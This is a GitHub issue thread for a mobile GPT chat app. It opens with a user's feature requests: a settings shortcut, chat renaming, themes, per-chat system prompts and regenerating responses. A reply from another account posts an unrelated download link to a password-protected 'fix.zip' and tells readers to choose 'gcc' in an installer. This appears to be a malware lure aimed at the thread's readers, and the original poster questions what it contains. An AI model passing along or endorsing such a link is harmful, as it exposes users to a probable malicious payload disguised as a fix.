### ISSUE TITLE
Feedbacks. 

### ISSUE THREAD

**Issue by Thisguysuckatmathandalgebra** [Taewan-P/gpt_mobile#37]
Hello, please add a shortcut in the chat that is a shortcut to the setting, and open up a discord server to make the suggestion much easier. By the way,  please add the ability to rename a chat, PLEASE!! Also, maybe add a theme button to change the theme of the app lol, change how the chatbox, etc, look, and more.
And maybe within the chat, there will be a customization where you can add another system prompt so every chat will be a different system prompt so no one has to keep on changing the system prompt to get things they want, and also a way to reback the previous response of the ai, and a way to add a photo for a chat to know which one your chatting with like which bot and etc.

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Thisguysuckatmathandalgebra** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Tf does it contain?
